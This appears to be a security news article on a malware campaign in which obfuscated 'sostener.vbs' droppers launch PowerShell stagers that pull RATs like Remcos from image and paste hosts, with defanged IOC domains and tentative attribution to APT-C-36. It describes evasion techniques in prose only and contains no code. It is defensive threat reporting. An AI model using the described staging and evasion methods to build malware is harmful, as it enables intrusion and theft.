Complex Malware Attack Unleashed – VBS Files Trigger PowerShell Execution in Multi-Phase Assault

Security analysts have uncovered a sophisticated cyberattack cluster, leveraging heavily obfuscated Visual Basic Script (VBS) files to infiltrate networks and deploy mighty Remote Access Trojans (RATs).

The campaign, centred around a filename “sostener.vbs” Spanish for ‘sustain” affects 16 open directories across multiple hosts and networks, each serving as conduits for a multi-phase malware installation system.

The attack, largely automated, employs a three-stage progression: initial VBS script execution, PowerShell script generation, and ultimate RAT deployment to grant threat actors remote control over victim systems.

Technical Breakdown: The Three-Stage Attack Pipeline

Stage 1: VBS Dropper Orchestrates Initial Penetration

The campaign begins with the execution of heavily obfuscated VBS files, which range in size from 2 to 3 MB.

These scripts are cluttered with useless code comments and dead variable assignments, which can confound analysis.

At runtime, the “sostener.vbs” scripts dynamically generate and executes a PowerShell script by embedding a base64-encoded payload within a variable.

This method of payload encryption and transformation ensures that only advanced malware detection tools or manual analysis can spot the threat before it escalates.

Stage 2: PowerShell Stager Expands Attack Surface

Once the base64 payload is decoded, the resulting PowerShell script contacts various remote services, such as file hosting platforms, to download additional malicious components.

These include memory injectors and custom-built remote access trojans (RATs), such as LimeRAT, DCRat, AsyncRAT, and Remcos.

Some of these elements are cleverly hidden inside seemingly legitimate JPEG images on the Internet Archive or within plaintext files on platforms like paste[.]ee and Bitbucket.

The stager locates these payloads by searching for specific markers (e.g., “<<BASE64_START>>” and “<<BASE64_END>>”) within the image or text files, then decodes and loads them into memory.

Stage 3: Injector and RAT – Final Payload Deployment

The third stage sees the downloaded injector loading the RAT directly into the system’s memory, bypassing disk detection.

The most frequently encountered remote access tool (RAT) in this campaign is Remcos, which communicates with command-and-control (C2) servers using dynamic DNS domains (e.g., “duckdns[.]org”) to manage rotating IP addresses and evade network-based defenses.

Infrastructure overlap is evident, as multiple stage-one droppers frequently funnel into the same stage-two and stage-three components, with shared C2 servers and identical TLS certificate fingerprints providing clear links between seemingly disparate targets.

Attribution, Indicators, and Ongoing Threat

While definitive attribution remains challenging, the tactics, language, and infrastructure observed strongly suggest ties to APT-C-36 (Blind Eagle), a notorious Colombian threat actor known for similar campaigns.

However, analysts caution that confirmation is not possible without additional intelligence. Indicators of compromise (IOCs) include specific DNS domains (e.g., remc21.duckdns.org, sosten38999.duckdns.org, and others), TLS certificate fingerprints, and file hashes associated with each stage of the attack.

Security teams are urged to monitor for the presence of large, obfuscated VBS files and unexpected PowerShell activity, especially those related to the mentioned domains and platforms.

As the threat actors continue to evolve their techniques, organizations must prioritize endpoint protection, behavioral monitoring, and threat intelligence integration to stay ahead of this persistent and agile threat landscape.

This multi-phase attack, powered by obfuscated VBS files and culminating in advanced RAT deployments, underscores the evolving sophistication of cybercriminal groups.

Vigilance and robust security measures are essential for organizations seeking to defend against such complex, multi-stage intrusions.

Threat Exploration

IOCs